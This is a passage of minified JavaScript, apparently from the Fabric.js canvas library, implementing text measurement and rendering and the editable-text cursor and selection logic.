y},_renderTextLine:function(y,M,p,D,w,x){this._renderChars(y,M,p,D,w,x)},_renderTextLinesBackground:function(y){if(this.textBackgroundColor||this.styleHas("textBackgroundColor")){for(var M,p,w,x,ee,se,le,D=y.fillStyle,S=this._getLeftOffset(),O=this._getTopOffset(),U=0,K=0,ve=this.path,ye=0,z=this._textLines.length;ye<z;ye++)if(M=this.getHeightOfLine(ye),this.textBackgroundColor||this.styleHas("textBackgroundColor",ye)){w=this._textLines[ye],p=this._getLineLeftOffset(ye),K=0,U=0,x=this.getValueOfPropertyAt(ye,0,"textBackgroundColor");for(var l=0,f=w.length;l<f;l++)ee=this.__charBounds[ye][l],se=this.getValueOfPropertyAt(ye,l,"textBackgroundColor"),ve?(y.save(),y.translate(ee.renderLeft,ee.renderTop),y.rotate(ee.angle),y.fillStyle=se,se&&y.fillRect(-ee.width/2,-M/this.lineHeight*(1-this._fontSizeFraction),ee.width,M/this.lineHeight),y.restore()):se!==x?(le=S+p+U,"rtl"===this.direction&&(le=this.width-le-K),y.fillStyle=x,x&&y.fillRect(le,O,K,M/this.lineHeight),U=ee.left,K=ee.width,x=se):K+=ee.kernedWidth;se&&!ve&&(le=S+p+U,"rtl"===this.direction&&(le=this.width-le-K),y.fillStyle=se,y.fillRect(le,O,K,M/this.lineHeight)),O+=M}else O+=M;y.fillStyle=D,this._removeShadow(y)}},getFontCache:function(y){var M=y.fontFamily.toLowerCase();g.charWidthsCache[M]||(g.charWidthsCache[M]={});var p=g.charWidthsCache[M],D=y.fontStyle.toLowerCase()+"_"+(y.fontWeight+"").toLowerCase();return p[D]||(p[D]={}),p[D]},_measureChar:function(y,M,p,D){var K,ee,se,le,w=this.getFontCache(M),O=p+y,U=this._getFontDeclaration(M)===this._getFontDeclaration(D),ve=M.fontSize/this.CACHE_FONT_SIZE;if(p&&void 0!==w[p]&&(se=w[p]),void 0!==w[y]&&(le=K=w[y]),U&&void 0!==w[O]&&(le=(ee=w[O])-se),void 0===K||void 0===se||void 0===ee){var ye=this.getMeasuringContext();this._setTextStyles(ye,M,!0)}return void 0===K&&(le=K=ye.measureText(y).width,w[y]=K),void 0===se&&U&&p&&(se=ye.measureText(p).width,w[p]=se),U&&void 0===ee&&(ee=ye.measureText(O).width,w[O]=ee,le=ee-se),{width:K*ve,kernedWidth:le*ve}},getHeightOfChar:function(y,M){return this.getValueOfPropertyAt(y,M,"fontSize")},measureLine:function(y){var M=this._measureLine(y);return 0!==this.charSpacing&&(M.width-=this._getWidthOfCharSpacing()),M.width<0&&(M.width=0),M},_measureLine:function(y){var p,D,x,S,ee,se,M=0,w=this._textLines[y],U=new Array(w.length),K=0,ve=this.path,le="right"===this.pathSide;for(this.__charBounds[y]=U,p=0;p<w.length;p++)S=this._getGraphemeBox(D=w[p],y,p,x),U[p]=S,M+=S.kernedWidth,x=D;if(U[p]={left:S?S.left+S.width:0,width:0,kernedWidth:0,height:this.fontSize},ve){switch(se=ve.segmentsInfo[ve.segmentsInfo.length-1].length,(ee=g.util.getPointOnPath(ve.path,0,ve.segmentsInfo)).x+=ve.pathOffset.x,ee.y+=ve.pathOffset.y,this.textAlign){case"left":K=le?se-M:0;break;case"center":K=(se-M)/2;break;case"right":K=le?0:se-M}for(K+=this.pathStartOffset*(le?-1:1),p=le?w.length-1:0;le?p>=0:p<w.length;le?p--:p++)K>se?K%=se:K<0&&(K+=se),this._setGraphemeOnPath(K,S=U[p],ee),K+=S.kernedWidth}return{width:M,numOfSpaces:0}},_setGraphemeOnPath:function(y,M,p){var w=this.path,x=g.util.getPointOnPath(w.path,y+M.kernedWidth/2,w.segmentsInfo);M.renderLeft=x.x-p.x,M.renderTop=x.y-p.y,M.angle=x.angle+("right"===this.pathSide?Math.PI:0)},_getGraphemeBox:function(y,M,p,D,w){var ee,x=this.getCompleteStyleDeclaration(M,p),S=D?this.getCompleteStyleDeclaration(M,p-1):{},O=this._measureChar(y,x,D,S),U=O.kernedWidth,K=O.width;0!==this.charSpacing&&(K+=ee=this._getWidthOfCharSpacing(),U+=ee);var se={width:K,left:0,height:x.fontSize,kernedWidth:U,deltaY:x.deltaY};if(p>0&&!w){var ve=this.__charBounds[M][p-1];se.left=ve.left+ve.width+O.kernedWidth-O.width}return se},getHeightOfLine:function(y){if(this.__lineHeights[y])return this.__lineHeights[y];for(var M=this._textLines[y],p=this.getHeightOfChar(y,0),D=1,w=M.length;D<w;D++)p=Math.max(this.getHeightOfChar(y,D),p);return this.__lineHeights[y]=p*this.lineHeight*this._fontSizeMult},calcTextHeight:function(){for(var y,M=0,p=0,D=this._textLines.length;p<D;p++)y=this.getHeightOfLine(p),M+=p===D-1?y/this.lineHeight:y;return M},_getLeftOffset:function(){return"ltr"===this.direction?-this.width/2:this.width/2},_getTopOffset:function(){return-this.height/2},_renderTextCommon:function(y,M){y.save();for(var p=0,D=this._getLeftOffset(),w=this._getTopOffset(),x=0,S=this._textLines.length;x<S;x++){var O=this.getHeightOfLine(x),U=O/this.lineHeight,K=this._getLineLeftOffset(x);this._renderTextLine(M,y,this._textLines[x],D+K,w+p+U,x),p+=O}y.restore()},_renderTextFill:function(y){!this.fill&&!this.styleHas("fill")||this._renderTextCommon(y,"fillText")},_renderTextStroke:function(y){(!this.stroke||0===this.strokeWidth)&&this.isEmptyStyles()||(this.shadow&&!this.shadow.affectStroke&&this._removeShadow(y),y.save(),this._setLineDash(y,this.strokeDashArray),y.beginPath(),this._renderTextCommon(y,"strokeText"),y.closePath(),y.restore())},_renderChars:function(y,M,p,D,w,x){var U,K,se,le,S=this.getHeightOfLine(x),O=-1!==this.textAlign.indexOf("justify"),ee="",ve=0,ye=this.path,z=!O&&0===this.charSpacing&&this.isEmptyStyles(x)&&!ye,l="ltr"===this.direction,f="ltr"===this.direction?1:-1,v=M.canvas.getAttribute("dir");if(M.save(),v!==this.direction&&(M.canvas.setAttribute("dir",l?"ltr":"rtl"),M.direction=l?"ltr":"rtl",M.textAlign=l?"left":"right"),w-=S*this._fontSizeFraction/this.lineHeight,z)return this._renderChar(y,M,x,0,p.join(""),D,w,S),void M.restore();for(var P=0,G=p.length-1;P<=G;P++)le=P===G||this.charSpacing||ye,ee+=p[P],se=this.__charBounds[x][P],0===ve?(D+=f*(se.kernedWidth-se.width),ve+=se.width):ve+=se.kernedWidth,O&&!le&&this._reSpaceAndTab.test(p[P])&&(le=!0),le||(U=U||this.getCompleteStyleDeclaration(x,P),K=this.getCompleteStyleDeclaration(x,P+1),le=g.util.hasStyleChanged(U,K,!1)),le&&(ye?(M.save(),M.translate(se.renderLeft,se.renderTop),M.rotate(se.angle),this._renderChar(y,M,x,P,ee,-ve/2,0,S),M.restore()):this._renderChar(y,M,x,P,ee,D,w,S),ee="",U=K,D+=f*ve,ve=0);M.restore()},_applyPatternGradientTransformText:function(y){var p,M=g.util.createCanvasElement(),D=this.width+this.strokeWidth,w=this.height+this.strokeWidth;return M.width=D,M.height=w,(p=M.getContext("2d")).beginPath(),p.moveTo(0,0),p.lineTo(D,0),p.lineTo(D,w),p.lineTo(0,w),p.closePath(),p.translate(D/2,w/2),p.fillStyle=y.toLive(p),this._applyPatternGradientTransform(p,y),p.fill(),p.createPattern(M,"no-repeat")},handleFiller:function(y,M,p){var D,w;return p.toLive?"percentage"===p.gradientUnits||p.gradientTransform||p.patternTransform?(y.translate(D=-this.width/2,w=-this.height/2),y[M]=this._applyPatternGradientTransformText(p),{offsetX:D,offsetY:w}):(y[M]=p.toLive(y,this),this._applyPatternGradientTransform(y,p)):(y[M]=p,{offsetX:0,offsetY:0})},_setStrokeStyles:function(y,M){return y.lineWidth=M.strokeWidth,y.lineCap=this.strokeLineCap,y.lineDashOffset=this.strokeDashOffset,y.lineJoin=this.strokeLineJoin,y.miterLimit=this.strokeMiterLimit,this.handleFiller(y,"strokeStyle",M.stroke)},_setFillStyles:function(y,M){return this.handleFiller(y,"fillStyle",M.fill)},_renderChar:function(y,M,p,D,w,x,S){var se,ve,O=this._getStyleDeclaration(p,D),U=this.getCompleteStyleDeclaration(p,D),K="fillText"===y&&U.fill,ee="strokeText"===y&&U.stroke&&U.strokeWidth;!ee&&!K||(M.save(),K&&(se=this._setFillStyles(M,U)),ee&&(ve=this._setStrokeStyles(M,U)),M.font=this._getFontDeclaration(U),O&&O.textBackgroundColor&&this._removeShadow(M),O&&O.deltaY&&(S+=O.deltaY),K&&M.fillText(w,x-se.offsetX,S-se.offsetY),ee&&M.strokeText(w,x-ve.offsetX,S-ve.offsetY),M.restore())},setSuperscript:function(y,M){return this._setScript(y,M,this.superscript)},setSubscript:function(y,M){return this._setScript(y,M,this.subscript)},_setScript:function(y,M,p){var D=this.get2DCursorLocation(y,!0),w=this.getValueOfPropertyAt(D.lineIndex,D.charIndex,"fontSize"),x=this.getValueOfPropertyAt(D.lineIndex,D.charIndex,"deltaY");return this.setSelectionStyles({fontSize:w*p.size,deltaY:x+w*p.baseline},y,M),this},_getLineLeftOffset:function(y){var M=this.getLineWidth(y),p=this.width-M,D=this.textAlign,w=this.direction,x=0,S=this.isEndOfWrapping(y);return"justify"===D||"justify-center"===D&&!S||"justify-right"===D&&!S||"justify-left"===D&&!S?0:("center"===D&&(x=p/2),"right"===D&&(x=p),"justify-center"===D&&(x=p/2),"justify-right"===D&&(x=p),"rtl"===w&&(x-=p),x)},_clearCache:function(){this.__lineWidths=[],this.__lineHeights=[],this.__charBounds=[]},_shouldClearDimensionCache:function(){var y=this._forceClearCache;return y||(y=this.hasStateChanged("_dimensionAffectingProps")),y&&(this.dirty=!0,this._forceClearCache=!1),y},getLineWidth:function(y){if(void 0!==this.__lineWidths[y])return this.__lineWidths[y];var p=this.measureLine(y).width;return this.__lineWidths[y]=p,p},_getWidthOfCharSpacing:function(){return 0!==this.charSpacing?this.fontSize*this.charSpacing/1e3:0},getValueOfPropertyAt:function(y,M,p){var D=this._getStyleDeclaration(y,M);return D&&void 0!==D[p]?D[p]:this[p]},_renderTextDecoration:function(y,M){if(this[M]||this.styleHas(M)){for(var p,D,w,x,S,O,U,K,ve,le,ye,z,l,f,A,v,ee=this._getLeftOffset(),se=this._getTopOffset(),P=this.path,G=this._getWidthOfCharSpacing(),X=this.offsets[M],L=0,h=this._textLines.length;L<h;L++)if(p=this.getHeightOfLine(L),this[M]||this.styleHas(M,L)){U=this._textLines[L],f=p/this.lineHeight,x=this._getLineLeftOffset(L),le=0,ye=0,K=this.getValueOfPropertyAt(L,0,M),v=this.getValueOfPropertyAt(L,0,"fill"),ve=se+f*(1-this._fontSizeFraction),D=this.getHeightOfChar(L,0),S=this.getValueOfPropertyAt(L,0,"deltaY");for(var R=0,J=U.length;R<J;R++)if(z=this.__charBounds[L][R],l=this.getValueOfPropertyAt(L,R,M),A=this.getValueOfPropertyAt(L,R,"fill"),w=this.getHeightOfChar(L,R),O=this.getValueOfPropertyAt(L,R,"deltaY"),P&&l&&A)y.save(),y.fillStyle=v,y.translate(z.renderLeft,z.renderTop),y.rotate(z.angle),y.fillRect(-z.kernedWidth/2,X*w+O,z.kernedWidth,this.fontSize/15),y.restore();else if((l!==K||A!==v||w!==D||O!==S)&&ye>0){var Z=ee+x+le;"rtl"===this.direction&&(Z=this.width-Z-ye),K&&v&&(y.fillStyle=v,y.fillRect(Z,ve+X*D+S,ye,this.fontSize/15)),le=z.left,ye=z.width,K=l,v=A,D=w,S=O}else ye+=z.kernedWidth;Z=ee+x+le,"rtl"===this.direction&&(Z=this.width-Z-ye),y.fillStyle=A,l&&A&&y.fillRect(Z,ve+X*D+S,ye-G,this.fontSize/15),se+=p}else se+=p;this._removeShadow(y)}},_getFontDeclaration:function(y,M){var p=y||this,D=this.fontFamily,w=g.Text.genericFonts.indexOf(D.toLowerCase())>-1,x=void 0===D||D.indexOf("'")>-1||D.indexOf(",")>-1||D.indexOf('"')>-1||w?p.fontFamily:'"'+p.fontFamily+'"';return[g.isLikelyNode?p.fontWeight:p.fontStyle,g.isLikelyNode?p.fontStyle:p.fontWeight,M?this.CACHE_FONT_SIZE+"px":p.fontSize+"px",x].join(" ")},render:function(y){!this.visible||this.canvas&&this.canvas.skipOffscreen&&!this.group&&!this.isOnScreen()||(this._shouldClearDimensionCache()&&this.initDimensions(),this.callSuper("render",y))},_splitTextIntoLines:function(y){for(var M=y.split(this._reNewline),p=new Array(M.length),D=["\n"],w=[],x=0;x<M.length;x++)p[x]=g.util.string.graphemeSplit(M[x]),w=w.concat(p[x],D);return w.pop(),{_unwrappedLines:p,lines:M,graphemeText:w,graphemeLines:p}},toObject:function(y){var M=_.concat(y),p=this.callSuper("toObject",M);return p.styles=g.util.stylesToArray(this.styles,this.text),p.path&&(p.path=this.path.toObject()),p},set:function(y,M){this.callSuper("set",y,M);var p=!1,D=!1;if("object"==typeof y)for(var w in y)"path"===w&&this.setPathInfo(),p=p||-1!==this._dimensionAffectingProps.indexOf(w),D=D||"path"===w;else p=-1!==this._dimensionAffectingProps.indexOf(y),D="path"===y;return D&&this.setPathInfo(),p&&(this.initDimensions(),this.setCoords()),this},complexity:function(){return 1}}),g.Text.ATTRIBUTE_NAMES=g.SHARED_ATTRIBUTES.concat("x y dx dy font-family font-style font-weight font-size letter-spacing text-decoration text-anchor".split(" ")),g.Text.DEFAULT_SVG_FONT_SIZE=16,g.Text.fromElement=function(y,M,p){if(!y)return M(null);var D=g.parseAttributes(y,g.Text.ATTRIBUTE_NAMES),w=D.textAnchor||"left";if((p=g.util.object.extend(p?b(p):{},D)).top=p.top||0,p.left=p.left||0,D.textDecoration){var x=D.textDecoration;-1!==x.indexOf("underline")&&(p.underline=!0),-1!==x.indexOf("overline")&&(p.overline=!0),-1!==x.indexOf("line-through")&&(p.linethrough=!0),delete p.textDecoration}"dx"in D&&(p.left+=D.dx),"dy"in D&&(p.top+=D.dy),"fontSize"in p||(p.fontSize=g.Text.DEFAULT_SVG_FONT_SIZE);var S="";"textContent"in y?S=y.textContent:"firstChild"in y&&null!==y.firstChild&&"data"in y.firstChild&&null!==y.firstChild.data&&(S=y.firstChild.data),S=S.replace(/^\s+|\s+$|\n+/g,"").replace(/\s+/g," ");var O=p.strokeWidth;p.strokeWidth=0;var U=new g.Text(S,p),K=U.getScaledHeight()/U.height,se=((U.height+U.strokeWidth)*U.lineHeight-U.height)*K,ve=U.getScaledHeight()+se,le=0;"center"===w&&(le=U.getScaledWidth()/2),"right"===w&&(le=U.getScaledWidth()),U.set({left:U.left-le,top:U.top-(ve-U.fontSize*(.07+U._fontSizeFraction))/U.lineHeight,strokeWidth:void 0!==O?O:1}),M(U)},g.Text.fromObject=function(y,M){var p=b(y),D=y.path;return delete p.path,g.Object._fromObject("Text",p,function(w){w.styles=g.util.stylesFromArray(y.styles,y.text),D?g.Object._fromObject("Path",D,function(x){w.set("path",x),M(w)},"path"):M(w)},"text")},g.Text.genericFonts=["sans-serif","serif","cursive","fantasy","monospace"],g.util.createAccessors&&g.util.createAccessors(g.Text)}}(we),j.util.object.extend(j.Text.prototype,{isEmptyStyles:function(E){if(!this.styles||void 0!==E&&!this.styles[E])return!0;var g=void 0===E?this.styles:{line:this.styles[E]};for(var b in g)for(var _ in g[b])for(var y in g[b][_])return!1;return!0},styleHas:function(E,g){if(!this.styles||!E||""===E||void 0!==g&&!this.styles[g])return!1;var b=void 0===g?this.styles:{0:this.styles[g]};for(var _ in b)for(var y in b[_])if(void 0!==b[_][y][E])return!0;return!1},cleanStyle:function(E){if(!this.styles||!E||""===E)return!1;var _,y,g=this.styles,b=0,M=!0,p=0;for(var w in g){for(var x in _=0,g[w]){var D;b++,(D=g[w][x]).hasOwnProperty(E)?(y?D[E]!==y&&(M=!1):y=D[E],D[E]===this[E]&&delete D[E]):M=!1,0!==Object.keys(D).length?_++:delete g[w][x]}0===_&&delete g[w]}for(var O=0;O<this._textLines.length;O++)p+=this._textLines[O].length;M&&b===p&&(this[E]=y,this.removeStyle(E))},removeStyle:function(E){if(this.styles&&E&&""!==E){var b,_,y,g=this.styles;for(_ in g){for(y in b=g[_])delete b[y][E],0===Object.keys(b[y]).length&&delete b[y];0===Object.keys(b).length&&delete g[_]}}},_extendStyles:function(E,g){var b=this.get2DCursorLocation(E);this._getLineStyle(b.lineIndex)||this._setLineStyle(b.lineIndex),this._getStyleDeclaration(b.lineIndex,b.charIndex)||this._setStyleDeclaration(b.lineIndex,b.charIndex,{}),j.util.object.extend(this._getStyleDeclaration(b.lineIndex,b.charIndex),g)},get2DCursorLocation:function(E,g){void 0===E&&(E=this.selectionStart);for(var b=g?this._unwrappedTextLines:this._textLines,_=b.length,y=0;y<_;y++){if(E<=b[y].length)return{lineIndex:y,charIndex:E};E-=b[y].length+this.missingNewlineOffset(y)}return{lineIndex:y-1,charIndex:b[y-1].length<E?b[y-1].length:E}},getSelectionStyles:function(E,g,b){void 0===E&&(E=this.selectionStart||0),void 0===g&&(g=this.selectionEnd||E);for(var _=[],y=E;y<g;y++)_.push(this.getStyleAtPosition(y,b));return _},getStyleAtPosition:function(E,g){var b=this.get2DCursorLocation(E);return(g?this.getCompleteStyleDeclaration(b.lineIndex,b.charIndex):this._getStyleDeclaration(b.lineIndex,b.charIndex))||{}},setSelectionStyles:function(E,g,b){void 0===g&&(g=this.selectionStart||0),void 0===b&&(b=this.selectionEnd||g);for(var _=g;_<b;_++)this._extendStyles(_,E);return this._forceClearCache=!0,this},_getStyleDeclaration:function(E,g){var b=this.styles&&this.styles[E];return b?b[g]:null},getCompleteStyleDeclaration:function(E,g){for(var y,b=this._getStyleDeclaration(E,g)||{},_={},M=0;M<this._styleProperties.length;M++)_[y=this._styleProperties[M]]=void 0===b[y]?this[y]:b[y];return _},_setStyleDeclaration:function(E,g,b){this.styles[E][g]=b},_deleteStyleDeclaration:function(E,g){delete this.styles[E][g]},_getLineStyle:function(E){return!!this.styles[E]},_setLineStyle:function(E){this.styles[E]={}},_deleteLineStyle:function(E){delete this.styles[E]}}),function(){function E(g){g.textDecoration&&(g.textDecoration.indexOf("underline")>-1&&(g.underline=!0),g.textDecoration.indexOf("line-through")>-1&&(g.linethrough=!0),g.textDecoration.indexOf("overline")>-1&&(g.overline=!0),delete g.textDecoration)}j.IText=j.util.createClass(j.Text,j.Observable,{type:"i-text",selectionStart:0,selectionEnd:0,selectionColor:"rgba(17,119,255,0.3)",isEditing:!1,editable:!0,editingBorderColor:"rgba(102,153,255,0.25)",cursorWidth:2,cursorColor:"",cursorDelay:1e3,cursorDuration:600,caching:!0,hiddenTextareaContainer:null,_reSpace:/\s|\n/,_currentCursorOpacity:0,_selectionDirection:null,_abortCursorAnimation:!1,__widthOfSpace:[],inCompositionMode:!1,initialize:function(g,b){this.callSuper("initialize",g,b),this.initBehavior()},setSelectionStart:function(g){g=Math.max(g,0),this._updateAndFire("selectionStart",g)},setSelectionEnd:function(g){g=Math.min(g,this.text.length),this._updateAndFire("selectionEnd",g)},_updateAndFire:function(g,b){this[g]!==b&&(this._fireSelectionChanged(),this[g]=b),this._updateTextarea()},_fireSelectionChanged:function(){this.fire("selection:changed"),this.canvas&&this.canvas.fire("text:selection:changed",{target:this})},initDimensions:function(){this.isEditing&&this.initDelayedCursor(),this.clearContextTop(),this.callSuper("initDimensions")},render:function(g){this.clearContextTop(),this.callSuper("render",g),this.cursorOffsetCache={},this.renderCursorOrSelection()},_render:function(g){this.callSuper("_render",g)},clearContextTop:function(g){if(this.isEditing&&this.canvas&&this.canvas.contextTop){var b=this.canvas.contextTop,_=this.canvas.viewportTransform;b.save(),b.transform(_[0],_[1],_[2],_[3],_[4],_[5]),this.transform(b),this._clearTextArea(b),g||b.restore()}},renderCursorOrSelection:function(){if(this.isEditing&&this.canvas&&this.canvas.contextTop){var g=this._getCursorBoundaries(),b=this.canvas.contextTop;this.clearContextTop(!0),this.selectionStart===this.selectionEnd?this.renderCursor(g,b):this.renderSelection(g,b),b.restore()}},_clearTextArea:function(g){var b=this.width+4,_=this.height+4;g.clearRect(-b/2,-_/2,b,_)},_getCursorBoundaries:function(g){void 0===g&&(g=this.selectionStart);var b=this._getLeftOffset(),_=this._getTopOffset(),y=this._getCursorBoundariesOffsets(g);return{left:b,top:_,leftOffset:y.left,topOffset:y.top}},_getCursorBoundariesOffsets:function(g){if(this.cursorOffsetCache&&"top"in this.cursorOffsetCache)return this.cursorOffsetCache;var b,_,y,D,M=0,p=0,w=this.get2DCursorLocation(g);y=w.charIndex,_=w.lineIndex;for(var x=0;x<_;x++)M+=this.getHeightOfLine(x);b=this._getLineLeftOffset(_);var S=this.__charBounds[_][y];return S&&(p=S.left),0!==this.charSpacing&&y===this._textLines[_].length&&(p-=this._getWidthOfCharSpacing()),D={top:M,left:b+(p>0?p:0)},"rtl"===this.direction&&(D.left*=-1),this.cursorOffsetCache=D,this.cursorOffsetCache},renderCursor:function(g,b){var _=this.get2DCursorLocation(),y=_.lineIndex,M=_.charIndex>0?_.charIndex-1:0,p=this.getValueOfPropertyAt(y,M,"fontSize"),D=this.scaleX*this.canvas.getZoom(),w=this.cursorWidth/D,x=g.topOffset,S=this.getValueOfPropertyAt(y,M,"deltaY");x+=(1-this._fontSizeFraction)*this.getHeightOfLine(y)/this.lineHeight-p*(1-this._fontSizeFraction),this.inCompositionMode&&this.renderSelection(g,b),b.fillStyle=this.cursorColor||this.getValueOfPropertyAt(y,M,"fill"),b.globalAlpha=this.__isMousedown?1:this._currentCursorOpacity,b.fillRect(g.left+g.leftOffset-w/2,x+g.top+S,w,p)},renderSelection:function(g,b){for(var _=this.inCompositionMode?this.hiddenTextarea.selectionStart:this.selectionStart,y=this.inCompositionMode?this.hiddenTextarea.selectionEnd:this.selectionEnd,M=-1!==this.textAlign.indexOf("justify"),p=this.get2DCursorLocation(_),D=this.get2DCursorLocation(y),w=p.lineIndex,x=D.lineIndex,S=p.charIndex<0?0:p.charIndex,O=D.charIndex<0?0:D.charIndex,U=w;U<=x;U++){var se,K=this._getLineLeftOffset(U)||0,ee=this.getHeightOfLine(U),ve=0,le=0;if(U===w&&(ve=this.__charBounds[w][S].left),U>=w&&U<x)le=M&&!this.isEndOfWrapping(U)?this.width:this.getLineWidth(U)||5;else if(U===x)if(0===O)le=this.__charBounds[x][O].left;else{var ye=this._getWidthOfCharSpacing();le=this.__charBounds[x][O-1].left+this.__charBounds[x][O-1].width-ye}se=ee,(this.lineHeight<1||U===x&&this.lineHeight>1)&&(ee/=this.lineHeight);var z=g.left+K+ve,l=le-ve,f=ee,A=0;this.inCompositionMode?(b.fillStyle=this.compositionColor||"black",f=1,A=ee):b.fillStyle=this.selectionColor,"rtl"===this.direction&&(z=this.width-z-l),b.fillRect(z,g.top+g.topOffset+A,l,f),g.topOffset+=se}},getCurrentCharFontSize:function(){var g=this._getCurrentCharIndex();return this.getValueOfPropertyAt(g.l,g.c,"fontSize")},getCurrentCharColor:function(){var g=this._getCurrentCharIndex();return this.getValueOfPropertyAt(g.l,g.c,"fill")},_getCurrentCharIndex:function(){var g=this.get2DCursorLocation(this.selectionStart,!0);return{l:g.lineIndex,c:g.charIndex>0?g.charIndex-1:0}}}),j.IText.fromObject=function(g,b){var _=j.util.stylesFromArray(g.styles,g.text),y=Object.assign({},g,{styles:_});if(E(y),y.styles)for(var M in y.styles)for(var p in y.styles[M])E(y.styles[M][p]);j.Object._fromObject("IText",y,b,"text")}}(),function(){var E=j.util.object.clone;j.util.object.extend(j.IText.prototype,{initBehavior:function(){this.initAddedHandler(),this.initRemovedHandler(),this.initCursorSelectionHandlers(),this.initDoubleClickSimulation(),this.mouseMoveHandler=this.mouseMoveHandler.bind(this)},onDeselect:function(){this.isEditing&&this.exitEditing(),this.selected=!1},initAddedHandler:function(){var g=this;this.on("added",function(){var b=g.canvas;b&&(b._hasITextHandlers||(b._hasITextHandlers=!0,g._initCanvasHandlers(b)),b._iTextInstances=b._iTextInstances||[],b._iTextInstances.push(g))})},initRemovedHandler:function(){var g=this;this.on("removed",function(){var b=g.canvas;b&&(b._iTextInstances=b._iTextInstances||[],j.util.removeFromArray(b._iTextInstances,g),0===b._iTextInstances.length&&(b._hasITextHandlers=!1,g._removeCanvasHandlers(b)))})},_initCanvasHandlers:function(g){g._mouseUpITextHandler=function(){g._iTextInstances&&g._iTextInstances.forEach(function(b){b.__isMousedown=!1})},g.on("mouse:up",g._mouseUpITextHandler)},_removeCanvasHandlers:function(g){g.off("mouse:up",g._mouseUpITextHandler)},_tick:function(){this._currentTickState=this._animateCursor(this,1,this.cursorDuration,"_onTickComplete")},_animateCursor:function(g,b,_,y){var M;return M={isAborted:!1,abort:function(){this.isAborted=!0}},g.animate("_currentCursorOpacity",b,{duration:_,onComplete:function(){M.isAborted||g[y]()},onChange:function(){g.canvas&&g.selectionStart===g.selectionEnd&&g.renderCursorOrSelection()},abort:function(){return M.isAborted}}),M},_onTickComplete:function(){var g=this;this._cursorTimeout1&&clearTimeout(this._cursorTimeout1),this._cursorTimeout1=setTimeout(function(){g._currentTickCompleteState=g._animateCursor(g,0,this.cursorDuration/2,"_tick")},100)},initDelayedCursor:function(g){var b=this,_=g?0:this.cursorDelay;this.abortCursorAnimation(),this._currentCursorOpacity=1,this._cursorTimeout2=setTimeout(function(){b._tick()},_)},abortCursorAnimation:function(){var g=this._currentTickState||this._currentTickCompleteState,b=this.canvas;this._currentTickState&&this._currentTickState.abort(),this._currentTickCompleteState&&this._currentTickCompleteState.abort(),clearTimeout(this._cursorTimeout1),clearTimeout(this._cursorTimeout2),this._currentCursorOpacity=0,g&&b&&b.clearContext(b.contextTop||b.contextContainer)},selectAll:function(){return this.selectionStart=0,this.selectionEnd=this._text.length,this._fireSelectionChanged(),this._updateTextarea(),this},getSelectedText:function(){return this._text.slice(this.selectionStart,this.selectionEnd).join("")},findWordBoundaryLeft:function(g){var b=0,_=g-1;if(this._reSpace.test(this._text[_]))for(;this._reSpace.test(this._text[_]);)b++,_--;for(;/\S/.test(this._text[_])&&_>-1;)b++,_--;return g-b},findWordBoundaryRight:function(g){var b=0,_=g;if(this._reSpace.test(this._text[_]))for(;this._reSpace.test(this._text[_]);)b++,_++;for(;/\S/.test(this._text[_])&&_<this._text.length;)b++,_++;return g+b},findLineBoundaryLeft:function(g){for(var b=0,_=g-1;!/\n/.test(this._text[_])&&_>-1;)b++,_--;return g-b},findLineBoundaryRight:function(g){for(var b=0,_=g;!/\n/.test(this._text[_])&&_<this._text.length;)b++,_++;return g+b},searchWordBoundary:function(g,b){for(var _=this._text,y=this._reSpace.test(_[g])?g-1:g,M=_[y],p=j.reNonWord;!p.test(M)&&y>0&&y<_.length;)M=_[y+=b];return p.test(M)&&(y+=1===b?0:1),y},selectWord:function(g){var b=this.searchWordBoundary(g=g||this.selectionStart,-1),_=this.searchWordBoundary(g,1);this.selectionStart=b,this.selectionEnd=_,this._fireSelectionChanged(),this._updateTextarea(),this.renderCursorOrSelection()},selectLine:function(g){var b=this.findLineBoundaryLeft(g=g||this.selectionStart),_=this.findLineBoundaryRight(g);return this.selectionStart=b,this.selectionEnd=_,this._fireSelectionChanged(),this._updateTextarea(),this},enterEditing:function(g){if(!this.isEditing&&this.editable)return this.canvas&&(this.canvas.calcOffset(),this.exitEditingOnOthers(this.canvas)),this.isEditing=!0,this.initHiddenTextarea(g),this.hiddenTextarea.focus(),this.hiddenTextarea.value=this.text,this._updateTextarea(),this._saveEditingProps(),this._setEditingProps(),this._textBeforeEdit=this.text,this._tick(),this.fire("editing:entered"),this._fireSelectionChanged(),this.canvas?(this.canvas.fire("text:editing:entered",{target:this}),this.initMouseMoveHandler(),this.canvas.requestRenderAll(),this):this},exitEditingOnOthers:function(g){g._iTextInstances&&g._iTextInstances.forEach(function(b){b.selected=!1,b.isEditing&&b.exitEditing()})},initMouseMoveHandler:function(){this.canvas.on("mouse:move",this.mouseMoveHandler)},mouseMoveHandler:function(g){if(this.__isMousedown&&this.isEditing){document.activeElement!==this.hiddenTextarea&&this.hiddenTextarea.focus();var b=this.getSelectionStartFromPointer(g.e),_=this.selectionStart,y=this.selectionEnd;(b!==this.__selectionStartOnMouseDown||_===y)&&(_===b||y===b)||(b>this.__selectionStartOnMouseDown?(this.selectionStart=this.__selectionStartOnMouseDown,this.selectionEnd=b):(this.selectionStart=b,this.selectionEnd=this.__selectionStartOnMouseDown),(this.selectionStart!==_||this.selectionEnd!==y)&&(this.restartCursorIfNeeded(),this._fireSelectionChanged(),this._updateTextarea(),this.renderCursorOrSelection()))}},_setEditingProps:function(){this.hoverCursor="text",this.canvas&&(this.canvas.defaultCursor=this.canvas.moveCursor="text"),this.borderColor=this.editingBorderColor,this.hasControls=this.selectable=!1,this.lockMovementX=this.lockMovementY=!0},fromStringToGraphemeSelection:function(g,b,_){var y=_.slice(0,g),M=j.util.string.graphemeSplit(y).length;if(g===b)return{selectionStart:M,selectionEnd:M};var p=_.slice(g,b);return{selectionStart:M,selectionEnd:M+j.util.string.graphemeSplit(p).length}},fromGraphemeToStringSelection:function(g,b,_){var M=_.slice(0,g).join("").length;return g===b?{selectionStart:M,selectionEnd:M}:{selectionStart:M,selectionEnd:M+_.slice(g,b).join("").length}},_updateTextarea:function(){if(this.cursorOffsetCache={},this.hiddenTextarea){if(!this.inCompositionMode){var g=this.fromGraphemeToStringSelection(this.selectionStart,this.selectionEnd,this._text);this.hiddenTextarea.selectionStart=g.selectionStart,this.hiddenTextarea.selectionEnd=g.selectionEnd}this.updateTextareaPosition()}},updateFromTextArea:function(){if(this.hiddenTextarea){this.cursorOffsetCache={},this.text=this.hiddenTextarea.value,this._shouldClearDimensionCache()&&(this.initDimensions(),this.setCoords());var 